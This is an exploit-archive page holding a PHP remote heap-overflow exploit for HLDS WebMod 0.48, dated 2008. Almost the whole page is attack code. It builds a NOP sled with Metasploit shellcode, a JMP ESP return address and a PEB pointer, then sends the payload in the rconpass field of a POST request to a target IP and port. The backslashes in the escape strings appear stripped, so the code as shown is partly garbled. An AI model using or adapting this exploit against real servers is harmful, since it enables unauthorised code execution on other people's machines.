HLDS WebMod 0.48 (rconpass) Remote Heap Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : HLDS WebMod 0.48 (rconpass) Remote Heap Overflow Exploit
# Published : 2008-05-03
# Author : SkOd
# Previous Title : HLDS WebMod 0.48 Multiple Remote Vulnerabilties
# Next Title : VLC 0.8.6d httpd_FileCallBack Remote Format String Exploit

<?php
## HLDS WebMod 0.48  (rconpass) Remote Heap Overflow Exploit
## Tested on HLDS Launcher 4.1.1.1, WebMod 0.48, Windows XP SP2 Hebrew
## shir, skod.uk [at] gmail [dot] com
## 17/12/2007

## Registers (rconpass = "A"x16444):
# EAX 67E04955 w_mm.67E04955
# ECX 41414141
# EDX 41414141
# EBX 0000000A
# ESP 08F650FC
# EBP 08F726D4
# ESI 08F72734
# EDI 00000000
# EIP 67E0498C w_mm.67E0498C
#########


error_reporting(7);
ini_set("max_execution_time",0);

if($_SERVER['argv'][1] && $_SERVER['argv'][2]) {
	$host = $_SERVER['argv'][1];
	$port = $_SERVER['argv'][2];
} else {

	echo ("rnHLDS WebMod 0.48 Remote Heap Overflow Exploitrn");
	echo ("Written by shir, skod.ukx40gmailx2Ecomrn");
	echo ("Usage: php {$_SERVER['argv'][0]} IP PORTrn");
	echo ("Example: php {$_SERVER['argv'][0]} 192.168.0.100 27015rn");
	exit();
}

echo "[~] Packing...rn";


$scode = "x66x83xC0x04xFFxE0"; /*ADD EAX, 4 => JMP EAX*/

# win32_bind - Calc executer. Metasploit.com
$shellcode =
"x33xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13xf4".
"x47xbaxa4x83xebxfcxe2xf4x08xafxfexa4xf4x47x31xe1".
"xc8xccxc6xa1x8cx46x55x2fxbbx5fx31xfbxd4x46x51xed".
"x7fx73x31xa5x1ax76x7ax3dx58xc3x7axd0xf3x86x70xa9".
"xf5x85x51x50xcfx13x9exa0x81xa2x31xfbxd0x46x51xc2".
"x7fx4bxf1x2fxabx5bxbbx4fx7fx5bx31xa5x1fxcexe6x80".
"xf0x84x8bx64x90xccxfax94x71x87xc2xa8x7fx07xb6x2f".
"x84x5bx17x2fx9cx4fx51xadx7fxc7x0axa4xf4x47x31xcc".
"xc8x18x8bx52x94x11x33x5cx77x87xc1xf4x9cxb7x30xa0".
"xabx2fx22x5ax7ex49xedx5bx13x24xdbxc8x97x47xbaxa4";

$evilcode = str_repeat("x90", 100);
$evilcode.= $shellcode;
$evilcode.= str_repeat("x90", 16156-(strlen($shellcode)));

$evilcode.= "xFDxAFx6Ax07"; #076AAFFD   FFE4 => JMP ESP (cstrikedllsmp.dll)


$evilcode.= str_repeat("x90", 60-(strlen($scode)));
$evilcode.= $scode;
$evilcode.= str_repeat("x90", 8);
$evilcode.= str_repeat("0", 72);
$evilcode.= str_repeat("%00", 4);
$evilcode.= str_repeat("0", 4);
$evilcode.= "x20xF0xFDx7F"; #Windows PEB Lock Pointer
$evilcode.= str_repeat("%00", 8);

$post = "rconpass=" . $evilcode . "&setcookiesNULL=rconpass";

$pack = "POST /auth.w?redir= HTTP/1.1rn";
$pack.= "Host: {$host}:{$port}rn";
$pack.= "User-Agent: Mozilla/5.0rn";
$pack.= "Accept: */*rn";
$pack.= "Accept-Language: en-us,en;q=0.5rn";
$pack.= "Accept-Encoding: gzip,deflatern";
$pack.= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7rn";
$pack.= "Keep-Alive: 300rn";
$pack.= "Connection: keep-alivern";
$pack.= "Content-Type: application/x-www-form-urlencodedrn";
$pack.= "Content-Length: ". strlen($post) ."rnrn" . $post;

echo "[~] Sending...rn";

$sock = @fsockopen($host, $port, $errno, $errstr, 10);
	if ($errstr)
		echo("[-] Can't connect {$host}:{$port}rn");
	else {
			fputs($sock, $pack);
			$tmp = fgets($sock,1024);
				if(strstr($tmp, '<'))
					echo "[-] Failed, you better try again.rn";
				else
					echo "[+] Shellcode should be executed.rn";
			fclose($sock);
		}
?> 

# www.Syue.com [2008-05-03]